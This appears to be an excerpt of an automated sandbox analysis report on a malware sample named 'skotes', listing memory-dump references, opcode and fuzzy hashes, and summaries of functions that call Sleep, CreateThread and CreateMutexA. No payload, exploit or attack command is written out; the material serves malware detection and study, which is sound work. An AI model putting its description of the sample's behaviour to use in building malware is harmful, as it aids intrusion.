Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr$File$CreateType
String ID: H
API String ID: 3443242726-2852464175
Opcode ID: 0009c69e8173ce0639e57c4d94fb5899db9b0a002275f14359645191dc99b73f
Instruction ID: 37f6429b8bbc0806665a0478d38ea78bdfe817c914b7ce8d45da55d0b7c6967a
Opcode Fuzzy Hash: 0009c69e8173ce0639e57c4d94fb5899db9b0a002275f14359645191dc99b73f
Instruction Fuzzy Hash: 89A13532A141588FCF19AF68CC91BAE3BB9AF46324F184199E811AF3D1DA349D03C791

Function 00947590 Relevance: 4.7, APIs: 3, Instructions: 158
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,9CBA457E,?,00000000,00989138,000000FF), ref: 009475CC
CreateThread.KERNEL32(00000000,00000000,00947430,009A8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 009476BF
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009476C9

Part of subcall function 0095D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0095D17B

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep$ConditionCreateThreadVariableWake
String ID:
API String ID: 79123409-0
Opcode ID: 3d67104068b32698a990123b177f7986030623e02b16d0637c321756f707d3c5
Instruction ID: c1b8614a68e505111be7dd81168fd6f49ded850f1dcc9b7633ac0f4abc906818
Opcode Fuzzy Hash: 3d67104068b32698a990123b177f7986030623e02b16d0637c321756f707d3c5
Instruction Fuzzy Hash: 66510070215248ABFB18CF68CC89F9E7BA5EB86308F544619F814973D1CB7AD484CF91

Function 00976FB4 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00976EE6), ref: 00976FD6
GetFileInformationByHandle.KERNEL32(?,?), ref: 00977030
__dosmaperr.LIBCMT ref: 009770C5

Part of subcall function 0097732A: __dosmaperr.LIBCMT ref: 0097735F

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 5c1d510df4c1ffcb606c3e3ba5546df6ef527f8796dde6e44a6d894101ec36fc
Instruction ID: 3b068ac0b93b7ecfa7764db0b4be06d07fc561f2211656a3bedbc7144a158cf8
Opcode Fuzzy Hash: 5c1d510df4c1ffcb606c3e3ba5546df6ef527f8796dde6e44a6d894101ec36fc
Instruction Fuzzy Hash: 7C414D72904204AFDB24DFB5DC41AAFF7F9EF89300B10892DF95AD3611EA349901DB61

Function 00949BA5 Relevance: 4.6, APIs: 3, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00949BA8
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 3329bee65ce13df1f5b28035e4fe246fa56f47f7fba505a24622d13253921521
Instruction ID: 5b52086cfd541157baff14902c88406c02493a5c86b6342b6438159087e07406
Opcode Fuzzy Hash: 3329bee65ce13df1f5b28035e4fe246fa56f47f7fba505a24622d13253921521
Instruction Fuzzy Hash: C33168326442008BFB18DB78DCC9F6EB7A6EFC2311F248219E414973D6C73999818B51

Function 00949CDA Relevance: 4.6, APIs: 3, Instructions: 139sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00949CDD
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: c102fa7ff8f7d1c0c15e7cce2c5d65a099a9e6e8f158645eab29ea1d3f538bbf
Instruction ID: ae4dada9f3bbdfb6af5e8191798e93ac4278fa1f600c5bcd3966a9e3d35ebef1
Opcode Fuzzy Hash: c102fa7ff8f7d1c0c15e7cce2c5d65a099a9e6e8f158645eab29ea1d3f538bbf
Instruction Fuzzy Hash: D1314832A451408BEF18DB78DCC9FAEB766EFC6310F248619E414973D5CB3999808B51

Function 00949F44 Relevance: 4.6, APIs: 3, Instructions: 137sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00949F47
Sleep.KERNEL32(00000064,?), ref: 0094A963
CreateMutexA.KERNEL32(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
